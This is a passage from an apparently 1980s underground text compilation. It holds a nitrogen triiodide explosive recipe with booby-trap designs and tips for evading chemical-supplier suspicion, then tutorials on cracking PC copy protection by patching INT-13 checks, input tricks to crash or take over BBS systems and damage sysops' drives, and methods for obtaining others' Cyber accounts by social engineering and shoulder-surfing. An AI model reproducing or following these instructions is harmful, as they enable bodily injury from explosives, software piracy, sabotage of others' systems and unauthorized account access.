  746. liquid into a fruit jar. Add the ammonium hydroxide and stir the mixture until
  747. the mixture is a chocolate brown and shows a little of the original color of
  748. the iodine. The amount of ammonia necessary will depend on its strength. An
  749. equal volume of ammonia is usually sufficient for a 15% or higher solution. The
  750. solution should be filtered at once, and shouldn't ever wait more than 10 or 15
  751. minutes, because it starts to dissolve again.
  752.  
  753. The explosive again should be stored and applied while wet. This material is
  754. chemically the same as the granular explosive, but because it was precipitated
  755. from a solution, it is much more finely divided, and the reaction happens
  756. almost simultaneously, so you can get it out before it all vanishes back into
  757. the solution.
  758.  
  759. 3.) Paint type #2. Dissolve 1 gram of potassium iodide in about 90cc of
  760. 18%-22% ammonium hydroxide. Add 4 grams of pulverized iodine. A deep black
  761. sediment should start forming. Let stand, and stir frequently for five minutes.
  762. Then, filter as usual. While the potassium iodide is not an integral part of
  763. the chemical reaction, the dissolved potassium iodide will allow the iodine
  764. crystals in turn to dissolve, and its common ion effect will cause less iodine
  765. crystals to be wasted. Since the iodine is by far the most expensive
  766. ingredient, you'll save money in the long run by using it.
  767.  
  768.                Care in Handling And Storage 
  769. Because this material is so unstable it deteriorates quickly. Don't make any
  770. more than you need to use in the next 24 hours. If you can't use it all
  771. immediately, the container you keep it in should be recapped tightly after use
  772. and the mouth wiped clean. The explosive can cause dark stain damage to things
  773. as rugs, clothing, chair seats, wallpaper, and light or clear plastics. A
  774. strong solution of sodium thiosulfate is effective for removing stains from
  775. hands and clothing before they set. Never leave the container of explosive in
  776. direct sunlight for more than a few minutes, as it will weaken the strength. Do
  777. NOT attempt to make a large explosion as it is dangerous and can cause
  778. deafness.  All equipment used should be thoroughly washed and the used filter
  779. paper flushed down the toilet. Under no circumstances attempt to handle the
  780. dried material which is extremely explosive and hazardous. If you can avoid
  781. storing the material in a container at all, there will be no chance that a
  782. loose stopper will let the material dry out and become a potential bomb. Tiny
  783. bits of this can be great fun, but it has to be handled with care.
  784.  
  785.                  Application
  786.  
  787. Although largely a scientific curiosity, this explosive finds itself well
  788. suited for practical jokes. It may easily be painted on the bottom side of
  789. light switches, sprinkled on floors, painted in keyholes, pencil sharpeners,
  790. doorknobs, chalkboards and in hundreds of other unsuspected places. It is 
  791. also ideal for catching locker thieves and desk prowlers. It will leave a dark 
  792. stain on his hands when it explodes, and only you will know how to remove it.
  793.  
  794.                   Reaction Equations
  795.  
  796.                     Ammonium
  797.       Ammonium      Ammonium    Nitrogen
  798. Iodine   Hydroxide       Iodide    Tri Iodide  Water
  799.  
  800. 3I     +   5NH OH   ---> 3NH I  +   NH NI    +  5H O
  801.   2           4             4         3  3        2
  802.  
  803. The theoretical yield of explosive from pure iodine is 54.1% by weight. The
  804. remainder of the iodine may be recovered for reuse from the ammonium iodide
  805. waste product by evaporating the waste liquid and treating with chlorine if a
  806. chemistry lab is available. The contact explosive is Ammonium Nitrogen
  807. Tri-Iodide, which explodes into iodine, nitrogen, and ammonia.
  808.  
  809.  Ammonium
  810.  Nitrigen
  811. Tri-Iodide     Iodine  Nitrogen Ammonia
  812.  
  813. 2NH NI    --->  3I   +    N    +  2NH
  814.    3  3           2        2         3
  815.  
  816.               Some Clever Uses For This Material
  817.  
  818. 1.) Contact Explosive Torpedos. Get some gelatin capsules, the kind pills are
  819. made of. Fill the small half with uncooked dry tapioca until it is half full.
  820. Then place a wet blob of contact explosive about 4 times the size of a straight
  821. pin head on top of it. Either the granular or paint type explosive will work.
  822. The capsule is then filled the rest of the way up with tapioca until, when the  _7+3 _capsule is put together, the grains of tapioca are packed tightly, and none are
  823. loose. If this is not done properly, the torpedos could go off prematurely, and
  824. the joke would be on you. The torpedos are then moistened at the joints to seal
  825. them and stored until the next day. They are not sensitive enough until the
  826. next day and too sensitive the day after, so plan your activities accordingly.
  827. These torpedos are the most fiendish devices made. You can lay one on top of a
  828. door, where it will roll off when the door is opened, and it will explode on
  829. contact with the floor. If you toss one some distance away it will appear as if
  830. someone else was responsible for the explosion. These torpedos are ideal as
  831. booby traps or for pulling practical jokes with. They may be carried in a small
  832. box filled with cotton until needed. Just treat the box gently, and all will be
  833. well.
  834.  
  835. 2.Contact Explosive Booby Traps. Prepare a small amount of contact explosive.
  836. Cut strips of newspaper 1 1/2 inches wide and 1 foot long. Cut a piece of
  837. string 1 foot long. Put a small amount of wet contact explosive on the strip of
  838. paper 1 inch from the end. Double the string. Now pull one end of the string
  839. back until there is a double loop in the string about 1 inch long. Do not tie.
  840. Lay this double loop across the wet contact explosive and tightly roll the
  841. paper and glue the end. Put away for a few days until thoroughly dry. When dry,
  842. pull the ends of the string and the booby trap will explode. The strings, when
  843. pulled, rub against the dry contact explosive, and make it explode.
  844.  
  845.  
  846.                Getting The Materials
  847.  
  848. There are quite a few chemical supply houses that you can mail order the
  849. materials you need. You'll have to sign a form stating that you're over 21 and
  850. won't use the chemicals for the types of things we're learning here. Note that
  851. the people who run these supply houses know what Iodine Crystals and Ammonium
  852. Hydroxide can do when mixed together, and if you order both from the same
  853. place, or in the same order, it may arouse some suspicion.
  854.  
  855. Check the classified ads in the back of magazines like Popular Science for the
  856. current supply houses. Order as many catalogs as you can find. Not all sell
  857. every chemical that you may want for this series. Also, you can break the
  858. orders up so as not to look suspicious. Lastly, some houses are used to selling
  859. to individuals, and will provide chemicals in 1 or 4 ounce lots, while others
  860. prefer to sell to large institutions, and sell their wares in 1 or 5 pound
  861. jugs. Split up your orders according to the quantities of each item you think
  862. you will be needing. An ounce of Iodine Crystals will cost three or four
  863. dollars an ounce, and an ounce bottle of iodine is pretty tiny, but it goes a
  864. long way. If you had to buy that by the pound, you might just want to forget
  865. the whole thing.
  866.  
  867.  
  868.  
  869.             ****************************************
  870.             *                                      *
  871.             *        Cracking On the IBMpc         *
  872.             *               Part I                 *
  873.             *                                      *
  874.             ****************************************
  875.  
  876. Introduction  _7+3 _------------
  877.   For years, I have seen cracking tutorials for the APPLE computers, but never
  878. have I seen one for the PC.  I have decided to try to write this series to help
  879. that pirate move up a level to a crackest.
  880.  
  881.   In this part, I will cover what happens with INT 13 and how most copy
  882. protection schemes will use it.  I strongly suggest a knowledge of Assembly
  883. (M/L) and how to use DEBUG.  These will be an important figure in cracking
  884. anything.
  885.  
  886. INT-13 - An overview
  887. --------------------
  888.   Many copy protection schemes use the disk interrupt (INT-13).  INT-13 is
  889. often use to either try to read in a illegaly formatted track/sector or to
  890. write/format a track/sector that has been damaged in some way.  INT-13 is
  891. called like any normal interrupt with the assembler command INT 13 (CD 13).
  892. [AH] is used to select which command to be used, with most of the other
  893. registers used for data.
  894.  
  895. INT-13 Cracking Collage
  896. -----------------------
  897.   Although, INT-13 is used in almost all protection schemes, the easiest to
  898. crack is the DOS file.  Now the protected program might use INT-13 to load some
  899. other data from a normal track/sector on a disk, so it is important to
  900. determine which tracks/sectors are important to the protection scheme.  I have
  901. found the best way to do this is to use LOCKSMITH/pc (what, you don't have LS.
  902. Contact your local pirate for it.) Use LS to analyze the diskette.  Write down
  903. any track/sector that seems abnormal.  These track are must likely are part of
  904. the protection routine.  Now, we must enter debug. Load in the file execute a
  905. search for CD 13.  Record any address show.  If no address are picked up, this
  906. mean 1 or 2 things, the program is not copy protected (bullshit) or that the
  907. check is in an other part of the program not yet loaded.  The latter
  908. being a real bitch to find, so I'll cover it in part II.  There is another
  909. choice.  The CD 13 might be hidden in self changing code.  Here is what a
  910. sector of hidden code might look like
  911.  
  912. -U CS:0000
  913. 1B00:0000 31DB     XOR    BX,BX
  914. 1B00:0002 8EDB     MOV    DS,BX
  915. 1B00:0004 BB0D00   MOV    BX,000D
  916. 1B00:0007 8A07     MOV    AL,[BX]
  917. 1B00:0009 3412     XOR    AL,12
  918. 1B00:000B 8807     MOV    [BX],AL
  919. 1B00:000D DF13            FIST   WORD...
  920.  
  921.   In this section of code, [AL] is set to DF at location 1B00:0007.  When you
  922. XOR DF and 12, you would get a CD(hex) for the INT opcode which is placed right
  923. next to a 13 ie, giving you CD13 or INT- 13.  This type of code can't and will
  924. not be found using debug's [S]earch command.
  925.  
  926. Finding Hidden INT-13s
  927. ----------------------
  928.   The way I find best to find hidden INT-13s, is to use a program called PC-
  929. WATCH (TRAP13 works well also).  This program traps the interrupts and will
  930. print where they were called from.  Once running this, you can just disassemble  _7+3 _around the address until you find code that look like it is setting up the disk
  931. interrupt.
  932.   An other way to decode the INT-13 is to use debug's [G]o command.  Just set a
  933. breakdown at the address give by PC-WATCH (both programs give the return
  934. address).  Ie, -G CS:000F (see code above).  When debug stops, you will have
  935. encoded not only the INT-13 but anything else leading up to it.
  936.  
  937. What to do once you find INT-13
  938. -------------------------------
  939.   Once you find the INT-13, the hard part for the most part is over.  All that
  940. is left to do is to fool the computer in to thinking the protection has been
  941. found.  To find out what the computer is looking for, examine the code right
  942. after the INT-13.  Look for any branches having to do with the CARRY FLAG or
  943. any CMP to the AH register.  If a JNE or JC (etc) occurs, then [U]nassembe the
  944. address listed with the jump.  If it is a CMP then just read on.  Here you must
  945. decide if the program was looking for a protected track or just a normal track.
  946. If it has a CMP AH,0 and it has read in a protected track, it can be assumed
  947. that it was looking to see if the program had successfully complete the
  948. READ/FORMAT of that track and that the disk had been copied thus JMPing back to
  949. DOS (usually).  If this is the case, Just NOP the bytes for the CMP and the
  950. corresponding JMP.  If the program just checked for the carry flag to be set,
  951. and it isn't, then the program usually assumes that the disk has been copied.
  952. Examine the following code
  953.  
  954.       INT 13      <-- Read in the Sector
  955.       JC 1B00     <-- Protection found
  956.       INT 19      <-- Reboot
  957. 1B00  (rest of program)
  958.  
  959.   The program carries out the INT and find an error (the illegaly formatted
  960. sector) so the carry flag is set.  The computer, at the next instruction, see
  961. that the carry flag is set and know that the protection has not been breached.
  962. In this case, to fool the computer, just change the "JC 1B00" to a "JMP 1B00"
  963. thus defeating the protection scheme.
  964.  
  965.  
  966. NOTE: the PROTECTION ROUTINE might be found in more than just 1 part of the
  967.      program
  968.  
  969. Handling EXE files
  970. ------------------
  971.   As we all know, Debug can read .EXE files but cannot write them.  To get
  972. around this, load and go about cracking the program as usual.  When the
  973. protection scheme has been found and tested, record (use the debug [D]ump
  974. command) to save + & - 10 bytes of the code around the INT 13.  Exit back to
  975. dos and rename the file to a .ZAP (any extension but .EXE will do) and
  976. reloading with debug.  Search the program for the 20+ bytes surrounding the
  977. code and record the address found.  Then just load this section and edit it
  978. like normal.  Save the file and exit back to dos.  Rename it back to the .EXE
  979. file and it should be cracked.  ***NOTE: Sometimes you have to fuck around for
  980. a while to make it work.
  981.  
  982. DISK I/O (INT-13)
  983. -----------------
  984.   This interrupt uses the AH resister to select the function to be used.  Here  _7+3 _is a chart describing the interrupt.
  985.  
  986. AH=0    Reset Disk
  987. AH=1    Read the Status of the Disk
  988.     system in to AL
  989.  
  990.     AL          Error
  991.   ----------------------------
  992.     00   - Successful
  993.     01   - Bad command given to INT
  994.    *02   - Address mark not found
  995.     03   - write attempted on write prot
  996.    *04   - request sector not found
  997.     08   - DMA overrun
  998.     09   - attempt to cross DMA boundary
  999.    *10   - bad CRC on disk read
  1000.     20   - controller has failed
  1001.     40   - seek operation failed
  1002.     80   - attachment failed
  1003. (* denotes most used in copy protection)
  1004. AH=2    Read Sectors
  1005.  
  1006.   input
  1007.      DL = Drive number (0-3)
  1008.      DH = Head number (0or1)
  1009.      CH = Track number
  1010.      CL = Sector number
  1011.      AL = # of sectors to read
  1012.   ES:BX = load address
  1013.   output
  1014.       AH =error number (see above)
  1015.       [Carry Flag Set]
  1016.       AL = # of sectors read
  1017.  
  1018. AH=3 Write (params. as above)
  1019. AH=4 Verify (params. as above -ES:BX)
  1020. AH=5 Format (params. as above -CL,AL
  1021.          ES:BX points to format
  1022.          Table)
  1023.  
  1024.   For more information on INT-13 see the IBM Technical Reference Manuals.
  1025.  
  1026. Coming Soon
  1027. ------------
  1028.   In part II, I will cover CALLs to INT-13 and INT-13 that is located in
  1029. different overlays of the program
  1030.  
  1031.  
  1032.  
  1033.   ***************************************************************************
  1034.   *                                                                         *
  1035.   *                          Cracking On the IBMpc                          *
  1036.   *                                 Part  II                                *
  1037.   *                                                                         *
  1038.   ***************************************************************************  _7+3 _
  1039. Introduction
  1040. ------------
  1041.  
  1042.   Ok guys, you now passed out of Kopy Klass 101 (dos files) and have this great
  1043. new game with overlays.  How the phuck do I crack this bitch.  You scanned the
  1044. entire .EXE file for the CD 13 and it's nowhere.  Where can it be you ask
  1045. yourself.
  1046.   In part II, I'll cover cracking Overlays and the use of locksmith in
  1047. cracking.  If you haven't read part I, then I suggest you do so.  The 2 files
  1048. go together.
  1049.  
  1050.  
  1051. Looking for Overlays
  1052. --------------------
  1053.   So, you cant find CD 13 in the .EXE file, well, it can mean 4 things.  1, the
  1054. .EXE (though it is mostly .COM) file is just a loader for the main file. 2, the
  1055. .EXE file loads in an overlay.  3, the CD 13 is encrypted &/or hidden in the
  1056. .EXE file. 4,
  1057.  your looking at the WRONG PHUCKEN PHILE.
  1058.   I won't discuss case 1 (or at least no here) because so many UNP files are
  1059. devoted to PROLOCK and SOFTGUARD, if you can't figure it out with them, your
  1060. PHUCKEN stupid.
  1061.   If you have case 3, use the technique in part I and restart from the beg. And
  1062. if you have case 4, shoot your self.
  1063.   You know the program uses overlays but don't see and on disk?  Try looking at
  1064. the disk with good old nortons.  Any hidden files are probably the overlays.
  1065. These are the ones we are after.  If you still can't find them, use PC-WATCH
  1066. (this program is a must!!! for all crackists.  Traps ALL interrupts).
  1067.  
  1068.  
  1069. Using PC-Watch to Find Overlays
  1070. -------------------------------
  1071.   Start up PC-Watch and EXCLUDE everything in the left col.  Search the right
  1072. col. until you find DOS21 - OpnFile and select it.  Now run the program to be
  1073. cracked.  Play the game until the protection is checked.  Examine you pcwatch
  1074. output to see what file was loaded right before it.  This probably is the one
  1075. holding the check.  If not, shit go through all the files.
  1076.  
  1077.  
  1078. You Have Found the Overlays
  1079. ---------------------------
  1080.   Great, now just crack the overlay as if it was a DOS file.  You don't need to
  1081. worry about .EXE file, debug can write an overlay file.  Part I explains the
  1082. basics of cracking.  I suggest that you keep a backup copy of the overlay so if
  1083. you phuck up, and you will, you can recover quickly. Ah, and you thought
  1084. cracking with overlays was going to be hard.
  1085.  
  1086.  
  1087. Locksmith and Cracking
  1088. ----------------------
  1089.  The copy/disk utility program Locksmith by AlphaLogic is a great tool in
  1090. cracking.  It's analyzing ability is great for determining what and where the
  1091. protection is.
  1092.  I find it useful, before I even start cracking, to analyze the protected disk
  1093. to find and id it's protection.  This helps in 2 ways.  First, it helps you to
  1094. know what to do in order to fake out the protection.  Second, it helps you to
  1095. find what the program is looking for.  _7+3 _ I suggest that you get locksmith if you don't already have it.  Check your
  1096. local pirate board for the program.  I also suggest getting PC-Watch and Norton
  1097. Utilities 3.1.  All of these program have many uses in the cracking world.
  1098.  
  1099.  
  1100.  
  1101.              How To Crash a Commadore BBS
  1102.  
  1103. Part One - How to crash a RAVICS BBS
  1104.  
  1105.   Try to chat with the sysop. If it starts to say "Attemp #1" and so on, then
  1106. just hit 'C' >VERY< fast a few hundred times. After it pages the sysop about
  1107. 30 times it will give an out of memory error in such and such a line.
  1108.  
  1109. Part Two - How to crash an IIBBS
  1110.  
  1111.   This will only work if the sysop is running either an un-modified version
  1112. of IIBBS, or he has the very first version. Log on as a new user. Log off
  1113. and then log on again as a new user.  Then log off and try to log on again
  1114. as the SECOND new user you logged in as. In the old version, the BBS dosn't
  1115. initialize the drive after writing to the relative file. Therefore, when you
  1116. try to log in as the second new user, it will try to read past the bad
  1117. position but will never find it. This will leave his drive spinning until
  1118. he can come in and reset the system. If it dosn't work the first time try
  1119. again with two more new users, and so on. The system will just sit there
  1120. sending a carrier to you. When the drive is left spinning it will heat up the
  1121. metal frame in inside of the 1541 drive. This will cause the readwwrite head
  1122. to be knocked out of alignment, costing the sysop a mere $45...
  1123.  
  1124. Part 3 - How to crash a 64 Exchange
  1125.  
  1126.   Go into the download section and start to download a file. When it is ready
  1127. to send (it should say 'A to abort, B to change block size. Ready to send')
  1128. then select B and enter '99e99' when  it asks for the new block size (99e99 is
  1129. a number bigger than the computer can accept). This will only work on older
  1130. versions of 64 Exchange.
  1131.  
  1132.  
  1133. Part One - Another Way to Crash IIBBS
  1134.  
  1135.   Log on and enter the message base. At the prompt enter '99e99'. This will
  1136. cause an overflow error. If the sysop has a crash handling routine, then
  1137. use the method in How to Crash C64 BBS's - I and fry his drive. Here is
  1138. another way. If you log in and it says 'You have mail' or whatever, but it
  1139. dosn't list who it's from and the date, then go into the e-mail section.
  1140. Proceed to read your mail.  It should say 'No mail found' or whatever. At the
  1141. prompt, enter 'R' for reply or 'D' for delete. It will delete your mail and
  1142. cause an Illegal quantity error.
  1143.  
  1144. Part Two - How to Crash a RAVICS V9.3
  1145.  
  1146.   Log on as a new user. When it say it's creating your ID hit a bunch of keys.
  1147. This will lock up the program and leave his drive spinning.
  1148.  
  1149. Part Three - How to Crash Hal BBS 4.6  _7+3 _
  1150.   Enter 255 for your ID # and 'HAL' for the password. If the sysop has the
  1151. BASIC version this won't work. But if it does you will now be in the sysop
  1152. menu. Have fun...
  1153.  
  1154. Part Four - How to Crash Ace Line 3.5
  1155.  
  1156.   Log on and check to see if they are running the version modified by General
  1157. Zod (it should have his name all over it). If it is just call back about 10
  1158. times. Sooner or later it will cause an Out of Memory error.
  1159.  
  1160.  
  1161.               How to crash GBBS ][ boards
  1162.  
  1163.       We all have that one local board around you that you would really
  1164. like to crash! Maybe the sysop did something really bad to you or
  1165. something in that nature! Boy he sure would get Mad when he wakes up with
  1166. both drives burned out, user file is messed up or something like that!
  1167.  
  1168.       One thing to remember is when you call the board to crash it, I'd
  1169. use a phoney allias name (even another person you want to get revenge
  1170. on too!) because they will really get mad about crashing thier board and
  1171. will really kick some ass when they find out who did it. Just a warning!
  1172.  
  1173. 1> Lets say the sysops name to the GBBS board is "Butch Jr.". Call the
  1174. place up and when it asks for your last name, type "Jr.". When it asks
  1175. for your password, type in what ever you have to type for a new user.
  1176. Then it should ask for your first name. Just type " Butch" (1 space
  1177. infront of name). This will automaticly put you into sysop command
  1178. level and you will be able to delete messages, users, exit the GBBS
  1179. program and initalize the disks and ect.....Just about anything your
  1180. little heart wants to do! Modify the board and delete the sysop too!
  1181. This way for crashing also works when you type in for last name:" Jr."
  1182. and first name "Butch". It should do the same thing. The one major
  1183. drawback to this way of crashing is that most GBBS boards have thier
  1184. oards modified to that you can't do this. They will have it either
  1185. hang up after you type it in, Display a nasty message for you, or
  1186. just ask for the last name again. Oh well! No body is perfect!
  1187.  
  1188. 2> Call the board up and log on as a new user. When it asks for the
  1189. city/state you live in, type in a few commas like this:
  1190.        "Tampa,,,,,,,,,,Fla" or ",,,,,,,,,,,,,,,,,,," will do!
  1191. You just have to have more than 2 or 3 commas to do the job right.
  1192. This way should kill the passwords on the user file! <ool!!
  1193.  
  1194. 3> When you leave a message up on the board, save it, and then it says
  1195. "Wait" for about 10 seconds. Vry this one: Leave a message on the board
  1196. and save it and when it says "Wait", Just do a little "esc-h"
  1197. (to hang up in Ascii Express). That way should be writting the message
  1198. and when it looses the carrier, it will be off the hook for the night!
  1199. You can hang up on either "Wait" (after saving message an` after you
  1200. abort into the main command board.
  1201.  
  1202. 4> When the GBBS asks for a number like board number or something like
  1203. that, type in "99E99". This creats and error on the board and might put  you in sysop command level depending on what serial number the GBBS
  1204. program is. It will do some other things too.
  1205.  
  1206. 5> When you log on and it asks for your password, type in a negative
  1207. number like "G-99FFF" or "A-01AAA" or some negative number kinda like
  1208. that. This should also create an error and might even put you in sysop
  1209. command level (you can do anything from there! Believe me!) But
  1210. like I said before, Depending on what type of serial number the program
  1211. is.
  1212.  
  1213. 6> Log on as a new user and when it's reading the new user welcome or
  1214. just any text file, type "Cntl-s Cntl-p :" and that should make a fatal
  1215. error on his part and put you proptly into basic or machine language
  1216. with dos loaded and you can work from there!
  1217.  
  1218. 7> New user reading welcome message and type "Cntl-s Cntl-p *" and
  1219. that will bomb the board out also.
  1220.  
  1221. 8> New user reading welcome message and type "Cntl-s Cntl-p" and start
  1222. pounding on the keyboard! That sould fill the buffer up and make a
  1223. fatal error and put you into machine language or basic. Work from there!
  1224.  
  1225. 9> New user reading welcome message and type "Cntl-s" and hold repeat
  1226. and "Cntl-p" down and that will also bomb the buffer too and put
  1227. you into machine or basic language.
  1228.  
  1229.  
  1230.             Hacking Control Data Corporation's Cyber
  1231.  
  1232.   This article will cover getting into and using NOS (Networking
  1233. Operating System) version 2.5.2 running on a Cyber 730 computer.  Cybers
  1234. generally run this operating system so I will just refer to this environment as
  1235. Cyber.  Also, Cyber is a slow and outdated operating system that is primarily
  1236. used only for college campuses for running compilers.  First off after you have
  1237. scanned a bunch of carriers you will need to know how Cyber identifies itself.
  1238. It goes like this:
  1239.  
  1240. WELCOME TO THE NOS SOFTWARE SYSTEM.
  1241. COPYRIGHT CONTROL DATA 1978, 1987.
  1242.  
  1243. 88/02/16. 02.36.53. N265100
  1244. CSUS CYBER 170-730.                     NOS 2.5.2-678/3.
  1245. FAMILY:
  1246.  
  1247.   You would normally just hit return at the family prompt.  Next prompt is:
  1248.  
  1249. USER NAME:
  1250.  
  1251.   User names are in the format  abcdxxx  where a is the location of where
  1252. the account is being used from (A-Z).  the b is a grouping specifying
  1253. privileges and limits for the account- usually A-G -where A is the lowest
  1254. access.  Some examples of how they would be used in a college system:
  1255.    A = lowest access - class accounts for students
  1256.    B = slightly higher than A (for students working on large projects)
  1257.    C = Much higher limits, these accounts are usually not too hard to get  _7+3 _       and they will normally last a long time!  Lab assistants use these.
  1258.    D = Instructors, Lecturers, Professors.. etc..
  1259.    E = same... (very hard to get these!)
  1260.  
  1261.   The C and D positions are usually constant according to the groupings.
  1262.   For example, a class would have accounts ranging from NADRAAA-AZZ
  1263.                               ^^^ ^^^
  1264.                          These can also be digits
  1265.  
  1266.   There are also special operator accounts which start with digits instead
  1267. of numbers. (ie 7ETPDOC)  These accounts can run programs such as the
  1268. monitor which can observe any tty connected to the system...
  1269.  
  1270.   The next prompt will be for the password, student account passwords cannot
  1271. be changed and are 7 random letters by default, other account passwords
  1272. can be changed.  You get 3 tries until you are logged out.  It is very
  1273. difficult if not impossible to use a brute force hacker or try to guess
  1274. someones account.. so how do you get on?  Here's one easy way...
  1275. Go down to your local college (make sure they have a cyber computer!)
  1276. then just buy a class catalog (they only cost around 50 cents) or you
  1277. could look, borrow, steal someone else's... then find a pascal or fortran
  1278. class that fits your schedule!  You will only have to attend the class
  1279. 3 or 4 times max.  Once you get there you should have no trouble, but
  1280. if the instructor asks you questions about why you are not on the roll,
  1281. just tell him that you are auditing the class (taking it without enrolling
  1282. so it won't affect your GPA).  The instructor will usually pass out
  1283. accounts on the 3rd or 4th day of class.. this method also works well
  1284. with just about any system they have on campus!  Another way to get
  1285. accounts is to go down to the computer lab and start snooping!  Look
  1286. over someones shoulder while they type in their password, or look thru
  1287. someones papers while they're in the bathroom, or look thru the assistants
  1288. desk while he is helping someone... (I have acquired accounts both ways,
  1289. and the first way is a lot easier with less hassles)  Also, you can use
  1290. commas instead of returns when entering user name and password.
  1291. Example:  at the family prompt, you could type  ,nadrajf,dsfgkcd
  1292.              or at the user name prompt   nadrajf,dsfgkcd
  1293.  
  1294.   After you enter your info, the system will respond with:
  1295.  
  1296. JSN: APXV, NAMIAF
  1297. /
  1298.  
  1299.   The 'APXV, NAMIAF' could be different depending on what job you were
  1300. attached to.  The help program looks a lot neat if you have vt100
  1301. emulation, if you do, type [screen,vt100] (don't type the brackets! from
  1302. now on, all commands I refer to will be enclosed in brackets)
  1303. Then type help for an extensive tutorial or a list of commands.
  1304. Your best bet at this point is to buy a quick reference guide at the
  1305. campus because I am only going to describe the most useful commands.
  1306. The / means you are in the batch subsystem, there are usually 6 or 7
  1307. other subsystems like basic, fortran, etc... return to batch mode by
  1308. typing [batch].
  1309.  
  1310. Some useful commands:
  1311.   _7+3 _   CATLIST    -  will show permanent files in your directory.
  1312.    ENQUIRE,F                     -  displays temporary files in your workspace.
  1313.    LIMITS                          -  displays your privileges.
  1314.    INFO                       -  get more online help.
  1315.    R                             -  re-execute last command.
  1316.    GET,fn              -  loads fn into the local file area.
  1317.    CHANGE               -  certain specs on a file.
  1318.    PERMIT              -  allow other users to use one of your files.
  1319.    REWIND,*           -  rewinds all your local files.
  1320.    NEW,fn                -  creates new file.
  1321.    PURGE               -  deletes files.
  1322.    LIST,F=fn                 -  list file.
  1323.    UPROC                  -  create an auto-execute procedure file.
  1324.    MAIL                      -  send/receive private mail.
  1325.    BYE                                            -  logoff.
  1326.  
  1327.   Use the [helpme,cmd] command for the exact syntax and parameters of these
  1328. commands.  There are also several machine specific 'application' programs
  1329. such as pascal, fortran, spitbol, millions of others that you can look
  1330. up with the INFO command... there are also the text editors; edit, xedit,
  1331. and fse (full screen editor).  Xedit is the easiest to use if you are
  1332. not at a Telray 1061 terminal and it has full documentation.  Simply
  1333. type [xedit,fn] to edit the file 'fn'.
  1334.  
  1335.   Special control characters used with Cyber:
  1336.  
  1337.   Control S and Control Q work normally, the terminate character is
  1338. Control T followed by a carriage return.  If you wanted to break out of
  1339. an auto-execute login program, you would have to hit ^T C/R very fast
  1340. and repetitively in order to break into the batch subsystem.  Control Z
  1341. is used to set environment variables and execute special low level
  1342. commands, example: [^Z TM C/R] this will terminate your connection...
  1343.  
  1344.   So now you're thinking, what the hell is Cyber good for?  Well, they
  1345. won't have any phone company records, and you can't get credit information
  1346. from one, and I am not going to tell you how to crash it since crashing
  1347. systems is a sin.  There are uses for a cyber though,  one handy use is
  1348. to set up a chat system, as there are normally 30-40 lines going into
  1349. a large university cyber system.  I have the source for a chat program
  1350. called the communicator that I will be releasing soon.  Another use is
  1351. some kind of underground information exchange that people frequently
  1352. set up on other systems, this can easily be done with Cyber.
  1353.  
  1354. Procedure files:
  1355.  
  1356.   A procedure file is similiar to a batch file for MS-DOS, and a shell
  1357. script for UNIX.  You can make a procedure file auto-execute by using
  1358. the UPROC command like [uproc,auto] will make the file 'auto', auto
  1359. execute.  There is also a special procedure file called the procfile in
  1360. which any procedure may be accessed by simply a - in front of it.  If your
  1361. procfile read:
  1362.  
  1363. .proc,cn.
  1364. .*  sample procedure
  1365. $catlist/un=7etpdoc.
  1366. $exit.
  1367.   _7+3 _  Then you could simply type -cn and the / prompt and it would execute
  1368. the catlist command.  Now back to uprocs,  you could easily write a whole
  1369. BBS in a procedure file or say you wanted to run a chat system and you
  1370. did not want people to change the password on your account, you could
  1371. do this:
  1372.  
  1373. .proc,chat,
  1374. PW"Password: "=(*A).
  1375. $ife,PW="cyber",yes.
  1376.    $chat.
  1377.    $revert.
  1378.    $bye.
  1379. $else,yes.
  1380.    $note./Wrong password, try again/.
  1381.    $revert.
  1382.    $bye.
  1383. $endif,yes.
  1384.  
  1385.   This procedure will ask the user for a password and if he doesn't type
  1386. "cyber" he will be logged off.  If he does get it right then he will be
  1387. dumped into the chat program and as soon as he exits the chat program,
  1388. he will be logged off.  This way, the user cannot get into the batch
  1389. subsystem and change your password or otherwise screw around with the
  1390. account.  The following is a listing of the procfil that I use on my
  1391. local system, it has a lot of handy utilities and examples...
  1392.  
  1393.  
  1394. .PROC,B.
  1395. .******BYE******
  1396. $DAYFILE.
  1397. $NOTE.//////////////////////////
  1398. $ASCII.
  1399. $BYE.
  1400. $REVERT,NOLIST.
  1401. #EOR
  1402. .PROC,TIME.
  1403. .******GIVES DAY AND TIME******
  1404. $NOTE./THE CURRENT DAY AND TIME IS/
  1405. $FIND,CLOCK./
  1406. $REVERT,NOLIST.
  1407. #EOR
  1408. .PROC,SIGN*I,IN.
  1409. .******SIGN PRINT UTILITY******.
  1410. $GET,IN.
  1411. $FIND,SIGN,#I=IN,#L=OUT.
  1412. $NOTE./TO PRINT, TYPE:   PRINT,OUT,CC,RPS=??/
  1413. $REVERT,NOLIST.
  1414. #EOR
  1415. .PROC,TA.
  1416. .******TALK******
  1417. $SACFIND,AID,COMM.
  1418. $REVERT,NOLIST.
  1419. #EOR
  1420. .PROC,DIR,UN=,FILE=.
  1421. .******DIRECTORY LISTING OF PERMANENT FILES******
  1422. $GET(ZZZZDIR=CAT/#UN=1GTL0CL)
  1423. ZZZZDIR(FILE,#UN=UN)
  1424. $RETURN(ZZZZDIR)
  1425. $REVERT,NOLIST.
  1426. #EOR
  1427. .PROC,Z19.
  1428. .******SET SCREEN TO Z19******
  1429. $SCREEN,Z19.
  1430. $NOTE./SCREEN,Z19.
  1431. $REVERT,NOLIST.
  1432. #EOR
  1433. .PROC,VT.
  1434. .******SET SCREEN TO VT100******
  1435. $SCREEN,VT100.
  1436. $NOTE./SCREEN,VT100.  _7+3 _$REVERT,NOLIST
  1437. #EOR
  1438. .PROC,SC.
  1439. .******SET SCREEN TO T10******
  1440. $SCREEN,T10.
  1441. $NOTE./SCREEN,T10.
  1442. $REVERT,NOLIST
  1443. #EOR
  1444. .PROC,C.
  1445. .******CATLIST******
  1446. $CATLIST.
  1447. $REVERT,NOLIST.
  1448. #EOR
  1449. .PROC,CA.
  1450. .******CATLIST,LO=F******
  1451. $CATLIST,LO=F.
  1452. $REVERT,NOLIST.
  1453. #EOR
  1454. .PROC,MT.
  1455. .******BBS******
  1456. $SACFIND,AID,MTAB.
  1457. $REVERT,NOLIST.
  1458. #EOR
  1459. .PROC,LI,FILE=.
  1460. .******LIST FILE******
  1461. $GET,FILE.
  1462. $ASCII.
  1463. $COPY(FILE)
  1464. $REVERT.
  1465. $EXIT.
  1466. $CSET(NORMAL)
  1467. $REVERT,NOLIST. WHERE IS THAT FILE??
  1468. #EOR
  1469. .PROC,LOCAL.
  1470. .******DIRECTORY OF LOCAL FILES******
  1471. $RETURN(PROCLIB,YYYYBAD,YYYYPRC)
